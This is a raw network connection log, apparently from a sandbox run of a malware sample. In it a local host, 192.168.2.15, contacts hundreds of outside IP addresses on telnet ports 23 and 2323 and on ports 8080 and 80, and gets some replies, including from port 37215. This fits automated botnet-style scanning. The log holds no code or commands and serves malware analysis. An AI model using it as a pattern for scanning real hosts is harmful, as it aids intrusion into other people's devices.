Feb 25, 2024 19:02:15.870193005 CET	6758	8080	192.168.2.15	62.3.213.124
Feb 25, 2024 19:02:15.870193958 CET	58983	23	192.168.2.15	175.211.153.97
Feb 25, 2024 19:02:15.870193958 CET	6758	8080	192.168.2.15	95.218.146.238
Feb 25, 2024 19:02:15.870193958 CET	58983	23	192.168.2.15	86.103.237.226
Feb 25, 2024 19:02:15.870193005 CET	6758	8080	192.168.2.15	85.41.90.48
Feb 25, 2024 19:02:15.870193005 CET	6758	8080	192.168.2.15	31.175.254.6
Feb 25, 2024 19:02:15.870204926 CET	58983	2323	192.168.2.15	36.214.161.67
Feb 25, 2024 19:02:15.870204926 CET	6758	8080	192.168.2.15	95.226.123.12
Feb 25, 2024 19:02:15.870204926 CET	58983	23	192.168.2.15	141.248.186.128
Feb 25, 2024 19:02:15.870204926 CET	6758	8080	192.168.2.15	31.221.127.13
Feb 25, 2024 19:02:15.870213032 CET	6758	8080	192.168.2.15	62.106.117.222
Feb 25, 2024 19:02:15.870213032 CET	58983	2323	192.168.2.15	180.218.66.30
Feb 25, 2024 19:02:15.870213032 CET	6758	8080	192.168.2.15	62.252.159.127
Feb 25, 2024 19:02:15.870213032 CET	58983	23	192.168.2.15	194.23.207.239
Feb 25, 2024 19:02:15.870213032 CET	6758	8080	192.168.2.15	94.45.226.35
Feb 25, 2024 19:02:15.870213032 CET	6758	8080	192.168.2.15	31.196.168.22
Feb 25, 2024 19:02:15.870213032 CET	6758	8080	192.168.2.15	62.31.169.248
Feb 25, 2024 19:02:15.870223999 CET	6758	8080	192.168.2.15	95.7.238.174
Feb 25, 2024 19:02:15.870229006 CET	6758	8080	192.168.2.15	31.144.4.150
Feb 25, 2024 19:02:15.870229006 CET	58983	23	192.168.2.15	52.67.2.198
Feb 25, 2024 19:02:15.870229006 CET	58983	23	192.168.2.15	83.155.235.252
Feb 25, 2024 19:02:15.870229959 CET	58983	23	192.168.2.15	200.108.182.232
Feb 25, 2024 19:02:15.870230913 CET	58983	23	192.168.2.15	216.165.14.141
Feb 25, 2024 19:02:15.870229959 CET	58983	23	192.168.2.15	170.235.224.217
Feb 25, 2024 19:02:15.870230913 CET	6758	8080	192.168.2.15	94.130.245.245
Feb 25, 2024 19:02:15.870230913 CET	6758	8080	192.168.2.15	31.172.2.30
Feb 25, 2024 19:02:15.870230913 CET	58983	23	192.168.2.15	69.104.28.29
Feb 25, 2024 19:02:15.870239019 CET	58983	23	192.168.2.15	178.240.1.141
Feb 25, 2024 19:02:15.870239019 CET	58983	2323	192.168.2.15	203.8.50.0
Feb 25, 2024 19:02:15.870239019 CET	6758	8080	192.168.2.15	94.138.219.105
Feb 25, 2024 19:02:15.870244026 CET	6758	8080	192.168.2.15	94.51.248.139
Feb 25, 2024 19:02:15.870244026 CET	58983	23	192.168.2.15	172.53.5.241
Feb 25, 2024 19:02:15.870244026 CET	58983	23	192.168.2.15	203.247.114.237
Feb 25, 2024 19:02:15.870244026 CET	6758	8080	192.168.2.15	62.118.212.223
Feb 25, 2024 19:02:15.870244026 CET	6758	8080	192.168.2.15	31.156.252.116
Feb 25, 2024 19:02:15.870281935 CET	58983	23	192.168.2.15	182.8.195.106
Feb 25, 2024 19:02:15.870281935 CET	6758	8080	192.168.2.15	31.88.223.208
Feb 25, 2024 19:02:15.870281935 CET	6758	8080	192.168.2.15	94.61.77.34
Feb 25, 2024 19:02:15.870281935 CET	6758	8080	192.168.2.15	31.44.87.53
Feb 25, 2024 19:02:15.870281935 CET	6758	8080	192.168.2.15	95.98.111.211
Feb 25, 2024 19:02:15.870281935 CET	58983	23	192.168.2.15	177.215.182.100
Feb 25, 2024 19:02:15.870281935 CET	6758	8080	192.168.2.15	94.84.188.66
Feb 25, 2024 19:02:15.870281935 CET	58983	23	192.168.2.15	184.135.130.82
Feb 25, 2024 19:02:15.870285988 CET	6758	8080	192.168.2.15	94.61.138.157
Feb 25, 2024 19:02:15.870285988 CET	58983	23	192.168.2.15	18.45.207.194
Feb 25, 2024 19:02:15.870285988 CET	6758	8080	192.168.2.15	62.201.93.43
Feb 25, 2024 19:02:15.870285988 CET	6758	8080	192.168.2.15	31.13.87.49
Feb 25, 2024 19:02:15.870285988 CET	58983	23	192.168.2.15	146.199.112.133
Feb 25, 2024 19:02:15.870285988 CET	6758	8080	192.168.2.15	94.13.74.176
Feb 25, 2024 19:02:15.870296001 CET	6758	8080	192.168.2.15	95.166.85.238
Feb 25, 2024 19:02:15.870301008 CET	6758	8080	192.168.2.15	94.202.208.95
Feb 25, 2024 19:02:15.870301008 CET	58983	23	192.168.2.15	41.112.236.244
Feb 25, 2024 19:02:15.870301008 CET	58983	2323	192.168.2.15	24.93.106.202
Feb 25, 2024 19:02:15.870301008 CET	6758	8080	192.168.2.15	85.243.254.199
Feb 25, 2024 19:02:15.870301008 CET	58983	23	192.168.2.15	12.77.89.221
Feb 25, 2024 19:02:15.870296001 CET	58983	23	192.168.2.15	85.123.87.145
Feb 25, 2024 19:02:15.870296001 CET	58983	23	192.168.2.15	102.248.103.243
Feb 25, 2024 19:02:15.870296001 CET	6758	8080	192.168.2.15	95.64.14.52
Feb 25, 2024 19:02:15.870301008 CET	6758	8080	192.168.2.15	94.17.14.190
Feb 25, 2024 19:02:15.870301008 CET	58983	23	192.168.2.15	197.229.94.196
Feb 25, 2024 19:02:15.870301008 CET	6758	8080	192.168.2.15	95.251.45.27
Feb 25, 2024 19:02:15.870337963 CET	6758	8080	192.168.2.15	85.198.18.66
Feb 25, 2024 19:02:15.870337963 CET	58983	23	192.168.2.15	93.21.197.77
Feb 25, 2024 19:02:15.870338917 CET	6758	8080	192.168.2.15	94.24.145.48
Feb 25, 2024 19:02:15.870338917 CET	6758	8080	192.168.2.15	62.242.53.89
Feb 25, 2024 19:02:15.870338917 CET	6758	8080	192.168.2.15	94.19.240.64
Feb 25, 2024 19:02:15.870338917 CET	6758	8080	192.168.2.15	94.136.49.85
Feb 25, 2024 19:02:15.870338917 CET	6758	8080	192.168.2.15	31.140.13.226
Feb 25, 2024 19:02:15.870347977 CET	6758	8080	192.168.2.15	94.52.236.200
Feb 25, 2024 19:02:15.870347023 CET	6758	8080	192.168.2.15	62.100.97.247
Feb 25, 2024 19:02:15.870347977 CET	6758	8080	192.168.2.15	85.219.9.223
Feb 25, 2024 19:02:15.870347977 CET	6758	8080	192.168.2.15	31.51.157.148
Feb 25, 2024 19:02:15.870347977 CET	6758	8080	192.168.2.15	85.241.107.53
Feb 25, 2024 19:02:15.870347977 CET	6758	8080	192.168.2.15	62.239.143.85
Feb 25, 2024 19:02:15.870347977 CET	58983	23	192.168.2.15	43.175.44.55
Feb 25, 2024 19:02:15.870353937 CET	58983	23	192.168.2.15	140.9.144.107
Feb 25, 2024 19:02:15.870353937 CET	6758	8080	192.168.2.15	95.179.20.122
Feb 25, 2024 19:02:15.870347977 CET	6758	8080	192.168.2.15	62.43.123.207
Feb 25, 2024 19:02:15.870347977 CET	6758	8080	192.168.2.15	62.217.253.133
Feb 25, 2024 19:02:15.870369911 CET	58983	23	192.168.2.15	73.67.181.240
Feb 25, 2024 19:02:15.870369911 CET	6758	8080	192.168.2.15	95.85.135.11
Feb 25, 2024 19:02:15.870369911 CET	58983	23	192.168.2.15	170.100.128.122
Feb 25, 2024 19:02:15.870371103 CET	58983	23	192.168.2.15	1.144.110.222
Feb 25, 2024 19:02:15.870371103 CET	58983	23	192.168.2.15	91.186.14.152
Feb 25, 2024 19:02:15.870371103 CET	6758	8080	192.168.2.15	62.90.223.247
Feb 25, 2024 19:02:15.870371103 CET	6758	8080	192.168.2.15	31.124.2.139
Feb 25, 2024 19:02:15.870378971 CET	6758	8080	192.168.2.15	31.229.253.45
Feb 25, 2024 19:02:15.870371103 CET	6758	8080	192.168.2.15	62.253.139.82
Feb 25, 2024 19:02:15.870383024 CET	6758	8080	192.168.2.15	94.138.18.17
Feb 25, 2024 19:02:15.870383024 CET	6758	8080	192.168.2.15	31.57.95.173
Feb 25, 2024 19:02:15.870383024 CET	6758	8080	192.168.2.15	95.158.197.206
Feb 25, 2024 19:02:15.870383024 CET	6758	8080	192.168.2.15	31.218.171.17
Feb 25, 2024 19:02:15.870384932 CET	6758	8080	192.168.2.15	62.12.186.109
Feb 25, 2024 19:02:15.870384932 CET	58983	23	192.168.2.15	66.43.95.80
Feb 25, 2024 19:02:15.870384932 CET	6758	8080	192.168.2.15	31.247.167.203
Feb 25, 2024 19:02:15.870398998 CET	6758	8080	192.168.2.15	94.118.224.203
Feb 25, 2024 19:02:15.870409966 CET	6758	8080	192.168.2.15	62.209.106.200
Feb 25, 2024 19:02:15.870424032 CET	6758	8080	192.168.2.15	62.18.234.60
Feb 25, 2024 19:02:15.870424032 CET	6758	8080	192.168.2.15	85.85.127.164
Feb 25, 2024 19:02:15.870428085 CET	58983	23	192.168.2.15	209.123.87.156
Feb 25, 2024 19:02:15.870429039 CET	58983	23	192.168.2.15	5.253.182.41
Feb 25, 2024 19:02:15.870429039 CET	6758	8080	192.168.2.15	94.130.132.4
Feb 25, 2024 19:02:15.870429039 CET	6758	8080	192.168.2.15	94.172.141.92
Feb 25, 2024 19:02:15.870429039 CET	6758	8080	192.168.2.15	94.206.215.185
Feb 25, 2024 19:02:15.870484114 CET	58983	23	192.168.2.15	145.136.172.113
Feb 25, 2024 19:02:15.870484114 CET	58983	23	192.168.2.15	161.173.54.20
Feb 25, 2024 19:02:15.870484114 CET	58983	23	192.168.2.15	90.77.185.177
Feb 25, 2024 19:02:15.870484114 CET	58983	23	192.168.2.15	159.166.137.94
Feb 25, 2024 19:02:15.870484114 CET	6758	8080	192.168.2.15	95.186.126.41
Feb 25, 2024 19:02:15.870484114 CET	6758	8080	192.168.2.15	62.68.171.206
Feb 25, 2024 19:02:15.870485067 CET	58983	23	192.168.2.15	51.170.181.168
Feb 25, 2024 19:02:15.870485067 CET	6758	8080	192.168.2.15	31.105.6.240
Feb 25, 2024 19:02:15.870492935 CET	6758	8080	192.168.2.15	31.220.38.252
Feb 25, 2024 19:02:15.870492935 CET	58983	23	192.168.2.15	210.27.219.104
Feb 25, 2024 19:02:15.870492935 CET	58983	23	192.168.2.15	14.120.27.106
Feb 25, 2024 19:02:15.870492935 CET	6758	8080	192.168.2.15	95.158.96.183
Feb 25, 2024 19:02:15.870492935 CET	6758	8080	192.168.2.15	95.42.147.62
Feb 25, 2024 19:02:15.870492935 CET	58983	2323	192.168.2.15	102.230.233.185
Feb 25, 2024 19:02:15.870492935 CET	6758	8080	192.168.2.15	95.1.39.153
Feb 25, 2024 19:02:15.870492935 CET	6758	8080	192.168.2.15	31.27.207.178
Feb 25, 2024 19:02:15.870752096 CET	6758	8080	192.168.2.15	62.7.81.23
Feb 25, 2024 19:02:15.870759964 CET	6758	8080	192.168.2.15	85.94.124.255
Feb 25, 2024 19:02:15.870769978 CET	6758	8080	192.168.2.15	94.124.188.247
Feb 25, 2024 19:02:15.870771885 CET	6758	8080	192.168.2.15	85.138.66.144
Feb 25, 2024 19:02:15.870774984 CET	6758	8080	192.168.2.15	95.64.128.140
Feb 25, 2024 19:02:15.870784998 CET	6758	8080	192.168.2.15	95.32.217.64
Feb 25, 2024 19:02:15.870788097 CET	6758	8080	192.168.2.15	95.68.238.150
Feb 25, 2024 19:02:15.870799065 CET	6758	8080	192.168.2.15	94.65.136.186
Feb 25, 2024 19:02:15.870801926 CET	6758	8080	192.168.2.15	95.199.44.111
Feb 25, 2024 19:02:15.870812893 CET	6758	8080	192.168.2.15	31.96.136.85
Feb 25, 2024 19:02:15.870814085 CET	6758	8080	192.168.2.15	94.44.203.246
Feb 25, 2024 19:02:15.870816946 CET	6758	8080	192.168.2.15	62.124.244.190
Feb 25, 2024 19:02:15.870831966 CET	6758	8080	192.168.2.15	31.254.74.217
Feb 25, 2024 19:02:15.870835066 CET	6758	8080	192.168.2.15	62.129.130.8
Feb 25, 2024 19:02:15.870835066 CET	6758	8080	192.168.2.15	85.48.192.76
Feb 25, 2024 19:02:15.870845079 CET	6758	8080	192.168.2.15	31.244.218.110
Feb 25, 2024 19:02:15.870856047 CET	6758	8080	192.168.2.15	31.93.117.95
Feb 25, 2024 19:02:15.870857954 CET	6758	8080	192.168.2.15	85.169.79.227
Feb 25, 2024 19:02:15.870863914 CET	6758	8080	192.168.2.15	31.177.174.67
Feb 25, 2024 19:02:15.870877981 CET	6758	8080	192.168.2.15	62.27.123.124
Feb 25, 2024 19:02:15.870898008 CET	6758	8080	192.168.2.15	31.55.203.160
Feb 25, 2024 19:02:15.870908976 CET	6758	8080	192.168.2.15	31.237.186.105
Feb 25, 2024 19:02:15.870910883 CET	6758	8080	192.168.2.15	62.194.142.78
Feb 25, 2024 19:02:15.870927095 CET	6758	8080	192.168.2.15	94.115.249.198
Feb 25, 2024 19:02:15.870927095 CET	6758	8080	192.168.2.15	95.48.4.199
Feb 25, 2024 19:02:15.870944977 CET	6758	8080	192.168.2.15	85.47.130.22
Feb 25, 2024 19:02:15.870949984 CET	6758	8080	192.168.2.15	95.215.35.201
Feb 25, 2024 19:02:15.870959044 CET	6758	8080	192.168.2.15	62.205.20.191
Feb 25, 2024 19:02:15.870969057 CET	6758	8080	192.168.2.15	94.92.89.79
Feb 25, 2024 19:02:15.870970011 CET	6758	8080	192.168.2.15	94.44.113.246
Feb 25, 2024 19:02:15.870970011 CET	6758	8080	192.168.2.15	62.250.58.144
Feb 25, 2024 19:02:15.870985985 CET	6758	8080	192.168.2.15	95.54.156.188
Feb 25, 2024 19:02:15.870985985 CET	6758	8080	192.168.2.15	85.220.140.202
Feb 25, 2024 19:02:15.871005058 CET	6758	8080	192.168.2.15	95.69.159.200
Feb 25, 2024 19:02:15.871021032 CET	6758	8080	192.168.2.15	95.64.75.8
Feb 25, 2024 19:02:15.871032000 CET	6758	8080	192.168.2.15	95.32.240.102
Feb 25, 2024 19:02:15.871036053 CET	6758	8080	192.168.2.15	31.198.227.103
Feb 25, 2024 19:02:15.871037960 CET	6758	8080	192.168.2.15	95.144.50.63
Feb 25, 2024 19:02:15.871058941 CET	6758	8080	192.168.2.15	31.99.29.112
Feb 25, 2024 19:02:15.871061087 CET	6758	8080	192.168.2.15	85.17.158.161
Feb 25, 2024 19:02:15.871061087 CET	6758	8080	192.168.2.15	94.217.9.220
Feb 25, 2024 19:02:15.871064901 CET	6758	8080	192.168.2.15	94.33.94.254
Feb 25, 2024 19:02:15.871068001 CET	6758	8080	192.168.2.15	94.184.109.176
Feb 25, 2024 19:02:15.871074915 CET	6758	8080	192.168.2.15	94.194.220.188
Feb 25, 2024 19:02:15.871088028 CET	6758	8080	192.168.2.15	31.127.165.97
Feb 25, 2024 19:02:15.871097088 CET	6758	8080	192.168.2.15	95.60.153.9
Feb 25, 2024 19:02:15.871100903 CET	6758	8080	192.168.2.15	31.17.206.145
Feb 25, 2024 19:02:15.871104002 CET	6758	8080	192.168.2.15	31.168.139.192
Feb 25, 2024 19:02:15.871115923 CET	6758	8080	192.168.2.15	31.100.39.59
Feb 25, 2024 19:02:15.871128082 CET	6758	8080	192.168.2.15	62.125.125.63
Feb 25, 2024 19:02:15.871159077 CET	6758	8080	192.168.2.15	95.188.166.56
Feb 25, 2024 19:02:15.871172905 CET	6758	8080	192.168.2.15	85.218.105.48
Feb 25, 2024 19:02:15.871172905 CET	6758	8080	192.168.2.15	85.12.129.234
Feb 25, 2024 19:02:15.871185064 CET	6758	8080	192.168.2.15	85.248.45.89
Feb 25, 2024 19:02:15.871186018 CET	6758	8080	192.168.2.15	62.91.6.9
Feb 25, 2024 19:02:15.871186018 CET	6758	8080	192.168.2.15	85.243.231.180
Feb 25, 2024 19:02:15.871200085 CET	6758	8080	192.168.2.15	94.198.109.85
Feb 25, 2024 19:02:15.871200085 CET	6758	8080	192.168.2.15	31.16.1.87
Feb 25, 2024 19:02:15.871218920 CET	6758	8080	192.168.2.15	62.53.155.215
Feb 25, 2024 19:02:15.871222019 CET	6758	8080	192.168.2.15	85.8.112.28
Feb 25, 2024 19:02:15.871226072 CET	6758	8080	192.168.2.15	31.16.121.169
Feb 25, 2024 19:02:15.871237993 CET	6758	8080	192.168.2.15	31.41.96.220
Feb 25, 2024 19:02:15.871254921 CET	6758	8080	192.168.2.15	62.135.128.67
Feb 25, 2024 19:02:15.871254921 CET	6758	8080	192.168.2.15	62.130.184.149
Feb 25, 2024 19:02:15.871259928 CET	6758	8080	192.168.2.15	31.49.108.27
Feb 25, 2024 19:02:15.871284008 CET	6758	8080	192.168.2.15	94.161.173.70
Feb 25, 2024 19:02:15.871284008 CET	6758	8080	192.168.2.15	31.68.165.64
Feb 25, 2024 19:02:15.871293068 CET	6758	8080	192.168.2.15	31.131.9.123
Feb 25, 2024 19:02:15.871305943 CET	6758	8080	192.168.2.15	85.211.145.160
Feb 25, 2024 19:02:15.871315956 CET	6758	8080	192.168.2.15	31.10.44.137
Feb 25, 2024 19:02:15.871324062 CET	6758	8080	192.168.2.15	94.156.158.128
Feb 25, 2024 19:02:15.871324062 CET	6758	8080	192.168.2.15	95.1.88.185
Feb 25, 2024 19:02:15.871315956 CET	6758	8080	192.168.2.15	85.182.151.137
Feb 25, 2024 19:02:15.871339083 CET	6758	8080	192.168.2.15	62.31.169.215
Feb 25, 2024 19:02:15.981204033 CET	23	58983	12.22.140.2	192.168.2.15
Feb 25, 2024 19:02:16.016140938 CET	8080	6758	85.239.46.11	192.168.2.15
Feb 25, 2024 19:02:16.044636965 CET	3884	60408	185.196.9.5	192.168.2.15
Feb 25, 2024 19:02:16.053762913 CET	8080	6758	31.220.78.70	192.168.2.15
Feb 25, 2024 19:02:16.053880930 CET	23	58983	62.254.120.66	192.168.2.15
Feb 25, 2024 19:02:16.062495947 CET	8080	6758	62.232.172.5	192.168.2.15
Feb 25, 2024 19:02:16.062531948 CET	37215	6246	41.250.164.15	192.168.2.15
Feb 25, 2024 19:02:16.066792011 CET	8080	6758	85.20.73.195	192.168.2.15
Feb 25, 2024 19:02:16.066891909 CET	8080	6758	85.248.211.27	192.168.2.15
Feb 25, 2024 19:02:16.067533970 CET	37215	6246	41.224.0.52	192.168.2.15
Feb 25, 2024 19:02:16.072768927 CET	8080	6758	94.84.29.227	192.168.2.15
Feb 25, 2024 19:02:16.075355053 CET	8080	6758	95.245.115.249	192.168.2.15
Feb 25, 2024 19:02:16.082179070 CET	8080	6758	94.254.58.69	192.168.2.15
Feb 25, 2024 19:02:16.083745956 CET	8080	6758	85.11.125.167	192.168.2.15
Feb 25, 2024 19:02:16.090620995 CET	37215	6246	41.238.39.93	192.168.2.15
Feb 25, 2024 19:02:16.093379021 CET	8080	6758	94.123.6.73	192.168.2.15
Feb 25, 2024 19:02:16.093584061 CET	6758	8080	192.168.2.15	94.123.6.73
Feb 25, 2024 19:02:16.108232021 CET	8080	6758	95.209.115.192	192.168.2.15
Feb 25, 2024 19:02:16.110327959 CET	8080	6758	95.105.46.218	192.168.2.15
Feb 25, 2024 19:02:16.117934942 CET	8080	6758	85.15.57.59	192.168.2.15
Feb 25, 2024 19:02:16.137778997 CET	8080	6758	95.38.245.74	192.168.2.15
Feb 25, 2024 19:02:16.145237923 CET	80	6502	112.164.107.142	192.168.2.15
Feb 25, 2024 19:02:16.155925035 CET	80	6502	112.204.255.6	192.168.2.15
Feb 25, 2024 19:02:16.157052994 CET	80	6502	112.148.39.1	192.168.2.15
Feb 25, 2024 19:02:16.157757044 CET	80	6502	112.206.23.8	192.168.2.15
Feb 25, 2024 19:02:16.167129040 CET	8080	6758	31.196.64.109	192.168.2.15
Feb 25, 2024 19:02:16.174119949 CET	37215	6246	41.71.50.2	192.168.2.15
Feb 25, 2024 19:02:16.189084053 CET	80	6502	112.115.28.81	192.168.2.15
Feb 25, 2024 19:02:16.206336975 CET	37215	6246	41.59.113.63	192.168.2.15
Feb 25, 2024 19:02:16.248346090 CET	80	6502	112.28.209.207	192.168.2.15
Feb 25, 2024 19:02:16.301882982 CET	8080	6758	85.142.204.96	192.168.2.15
Feb 25, 2024 19:02:16.856975079 CET	6502	80	192.168.2.15	95.5.109.38
Feb 25, 2024 19:02:16.856977940 CET	6502	80	192.168.2.15	95.124.58.91
Feb 25, 2024 19:02:16.856978893 CET	6502	80	192.168.2.15	95.149.167.0
Feb 25, 2024 19:02:16.856980085 CET	6502	80	192.168.2.15	95.194.106.127
Feb 25, 2024 19:02:16.856981993 CET	6502	80	192.168.2.15	95.203.142.93
Feb 25, 2024 19:02:16.857034922 CET	6502	80	192.168.2.15	95.103.167.147
Feb 25, 2024 19:02:16.857034922 CET	6502	80	192.168.2.15	95.154.99.246
Feb 25, 2024 19:02:16.857034922 CET	6502	80	192.168.2.15	95.169.209.8
Feb 25, 2024 19:02:16.857042074 CET	6502	80	192.168.2.15	95.13.44.53
Feb 25, 2024 19:02:16.857043028 CET	6502	80	192.168.2.15	95.20.240.250
Feb 25, 2024 19:02:16.857042074 CET	6502	80	192.168.2.15	95.124.9.113
Feb 25, 2024 19:02:16.857044935 CET	6502	80	192.168.2.15	95.200.108.210
Feb 25, 2024 19:02:16.857044935 CET	6502	80	192.168.2.15	95.191.116.176
Feb 25, 2024 19:02:16.857044935 CET	6502	80	192.168.2.15	95.100.51.55
Feb 25, 2024 19:02:16.857042074 CET	6502	80	192.168.2.15	95.118.105.168
Feb 25, 2024 19:02:16.857042074 CET	6502	80	192.168.2.15	95.102.30.227
Feb 25, 2024 19:02:16.857042074 CET	6502	80	192.168.2.15	95.161.232.36
Feb 25, 2024 19:02:16.857045889 CET	6502	80	192.168.2.15	95.120.123.140
Feb 25, 2024 19:02:16.857045889 CET	6502	80	192.168.2.15	95.215.204.10
Feb 25, 2024 19:02:16.857100010 CET	6502	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:16.857100010 CET	6502	80	192.168.2.15	95.46.247.172
Feb 25, 2024 19:02:16.857100010 CET	6502	80	192.168.2.15	95.106.2.22
Feb 25, 2024 19:02:16.857100010 CET	6502	80	192.168.2.15	95.234.123.151
Feb 25, 2024 19:02:16.857100010 CET	6502	80	192.168.2.15	95.159.225.176
Feb 25, 2024 19:02:16.857100010 CET	6502	80	192.168.2.15	95.207.100.182
Feb 25, 2024 19:02:16.857104063 CET	6502	80	192.168.2.15	95.51.93.168
Feb 25, 2024 19:02:16.857104063 CET	6502	80	192.168.2.15	95.134.20.232
Feb 25, 2024 19:02:16.857105017 CET	6502	80	192.168.2.15	95.75.114.187
Feb 25, 2024 19:02:16.857104063 CET	6502	80	192.168.2.15	95.13.6.8
Feb 25, 2024 19:02:16.857105017 CET	6502	80	192.168.2.15	95.202.78.180
Feb 25, 2024 19:02:16.857104063 CET	6502	80	192.168.2.15	95.164.203.199
Feb 25, 2024 19:02:16.857105017 CET	6502	80	192.168.2.15	95.248.186.87
Feb 25, 2024 19:02:16.857104063 CET	6502	80	192.168.2.15	95.85.160.48
Feb 25, 2024 19:02:16.857109070 CET	6502	80	192.168.2.15	95.144.17.196
Feb 25, 2024 19:02:16.857110977 CET	6502	80	192.168.2.15	95.39.113.241
Feb 25, 2024 19:02:16.857104063 CET	6502	80	192.168.2.15	95.9.193.218
Feb 25, 2024 19:02:16.857105970 CET	6502	80	192.168.2.15	95.79.0.165
Feb 25, 2024 19:02:16.857109070 CET	6502	80	192.168.2.15	95.96.101.103
Feb 25, 2024 19:02:16.857112885 CET	6502	80	192.168.2.15	95.210.129.243
Feb 25, 2024 19:02:16.857109070 CET	6502	80	192.168.2.15	95.91.91.181
Feb 25, 2024 19:02:16.857109070 CET	6502	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:16.857109070 CET	6502	80	192.168.2.15	95.139.106.185
Feb 25, 2024 19:02:16.857153893 CET	6502	80	192.168.2.15	95.74.39.197
Feb 25, 2024 19:02:16.857153893 CET	6502	80	192.168.2.15	95.222.247.135
Feb 25, 2024 19:02:16.857155085 CET	6502	80	192.168.2.15	95.207.27.237
Feb 25, 2024 19:02:16.857161045 CET	6502	80	192.168.2.15	95.183.62.94
Feb 25, 2024 19:02:16.857161045 CET	6502	80	192.168.2.15	95.253.146.83
Feb 25, 2024 19:02:16.857161999 CET	6502	80	192.168.2.15	95.98.88.122
Feb 25, 2024 19:02:16.857161999 CET	6502	80	192.168.2.15	95.144.70.102
Feb 25, 2024 19:02:16.857163906 CET	6502	80	192.168.2.15	95.141.20.179
Feb 25, 2024 19:02:16.857163906 CET	6502	80	192.168.2.15	95.56.25.22
Feb 25, 2024 19:02:16.857163906 CET	6502	80	192.168.2.15	95.2.223.124
Feb 25, 2024 19:02:16.857163906 CET	6502	80	192.168.2.15	95.26.143.62
Feb 25, 2024 19:02:16.857163906 CET	6502	80	192.168.2.15	95.221.147.73
Feb 25, 2024 19:02:16.857163906 CET	6502	80	192.168.2.15	95.98.209.140
Feb 25, 2024 19:02:16.857167006 CET	6502	80	192.168.2.15	95.219.163.66
Feb 25, 2024 19:02:16.857163906 CET	6502	80	192.168.2.15	95.81.66.115
Feb 25, 2024 19:02:16.857167006 CET	6502	80	192.168.2.15	95.137.61.174
Feb 25, 2024 19:02:16.857163906 CET	6502	80	192.168.2.15	95.32.30.210
Feb 25, 2024 19:02:16.857167006 CET	6502	80	192.168.2.15	95.45.235.15
Feb 25, 2024 19:02:16.857167006 CET	6502	80	192.168.2.15	95.74.35.1
Feb 25, 2024 19:02:16.857167006 CET	6502	80	192.168.2.15	95.45.37.104
Feb 25, 2024 19:02:16.857207060 CET	6502	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:16.857209921 CET	6502	80	192.168.2.15	95.150.98.4
Feb 25, 2024 19:02:16.857209921 CET	6502	80	192.168.2.15	95.66.0.56
Feb 25, 2024 19:02:16.857213974 CET	6502	80	192.168.2.15	95.136.168.67
Feb 25, 2024 19:02:16.857215881 CET	6502	80	192.168.2.15	95.122.219.58
Feb 25, 2024 19:02:16.857215881 CET	6502	80	192.168.2.15	95.178.9.8
Feb 25, 2024 19:02:16.857215881 CET	6502	80	192.168.2.15	95.112.186.9
Feb 25, 2024 19:02:16.857215881 CET	6502	80	192.168.2.15	95.183.162.216
Feb 25, 2024 19:02:16.857217073 CET	6502	80	192.168.2.15	95.106.228.61
Feb 25, 2024 19:02:16.857215881 CET	6502	80	192.168.2.15	95.220.136.138
Feb 25, 2024 19:02:16.857217073 CET	6502	80	192.168.2.15	95.73.101.78
Feb 25, 2024 19:02:16.857215881 CET	6502	80	192.168.2.15	95.183.161.67
Feb 25, 2024 19:02:16.857217073 CET	6502	80	192.168.2.15	95.89.160.7
Feb 25, 2024 19:02:16.857217073 CET	6502	80	192.168.2.15	95.226.36.117
Feb 25, 2024 19:02:16.857217073 CET	6502	80	192.168.2.15	95.169.237.23
Feb 25, 2024 19:02:16.857217073 CET	6502	80	192.168.2.15	95.227.139.39
Feb 25, 2024 19:02:16.857217073 CET	6502	80	192.168.2.15	95.42.40.2
Feb 25, 2024 19:02:16.857217073 CET	6502	80	192.168.2.15	95.54.216.185
Feb 25, 2024 19:02:16.857248068 CET	6502	80	192.168.2.15	95.201.65.91
Feb 25, 2024 19:02:16.857248068 CET	6502	80	192.168.2.15	95.65.165.82
Feb 25, 2024 19:02:16.857256889 CET	6502	80	192.168.2.15	95.186.105.35
Feb 25, 2024 19:02:16.857256889 CET	6502	80	192.168.2.15	95.230.184.90
Feb 25, 2024 19:02:16.857256889 CET	6502	80	192.168.2.15	95.203.153.165
Feb 25, 2024 19:02:16.857259989 CET	6502	80	192.168.2.15	95.75.112.86
Feb 25, 2024 19:02:16.857261896 CET	6502	80	192.168.2.15	95.169.30.119
Feb 25, 2024 19:02:16.857263088 CET	6502	80	192.168.2.15	95.139.97.208
Feb 25, 2024 19:02:16.857263088 CET	6502	80	192.168.2.15	95.174.242.195
Feb 25, 2024 19:02:16.857263088 CET	6502	80	192.168.2.15	95.124.232.232
Feb 25, 2024 19:02:16.857263088 CET	6502	80	192.168.2.15	95.224.233.140
Feb 25, 2024 19:02:16.857263088 CET	6502	80	192.168.2.15	95.124.52.1
Feb 25, 2024 19:02:16.857264996 CET	6502	80	192.168.2.15	95.203.191.231
Feb 25, 2024 19:02:16.857263088 CET	6502	80	192.168.2.15	95.98.44.178
Feb 25, 2024 19:02:16.857264042 CET	6502	80	192.168.2.15	95.117.166.74
Feb 25, 2024 19:02:16.857264996 CET	6502	80	192.168.2.15	95.90.159.6
Feb 25, 2024 19:02:16.857264996 CET	6502	80	192.168.2.15	95.135.220.136
Feb 25, 2024 19:02:16.857280970 CET	6502	80	192.168.2.15	95.138.32.141
Feb 25, 2024 19:02:16.857310057 CET	6502	80	192.168.2.15	95.91.130.219
Feb 25, 2024 19:02:16.857310057 CET	6502	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:16.857311964 CET	6502	80	192.168.2.15	95.159.50.147
Feb 25, 2024 19:02:16.857312918 CET	6502	80	192.168.2.15	95.91.65.107
Feb 25, 2024 19:02:16.857312918 CET	6502	80	192.168.2.15	95.106.35.246
Feb 25, 2024 19:02:16.857314110 CET	6502	80	192.168.2.15	95.93.177.200
Feb 25, 2024 19:02:16.857314110 CET	6502	80	192.168.2.15	95.128.87.117
Feb 25, 2024 19:02:16.857316017 CET	6502	80	192.168.2.15	95.114.137.175
Feb 25, 2024 19:02:16.857316971 CET	6502	80	192.168.2.15	95.30.50.126
Feb 25, 2024 19:02:16.857316017 CET	6502	80	192.168.2.15	95.160.34.100
Feb 25, 2024 19:02:16.857316971 CET	6502	80	192.168.2.15	95.142.138.252
Feb 25, 2024 19:02:16.857316017 CET	6502	80	192.168.2.15	95.252.171.217
Feb 25, 2024 19:02:16.857316971 CET	6502	80	192.168.2.15	95.165.141.115
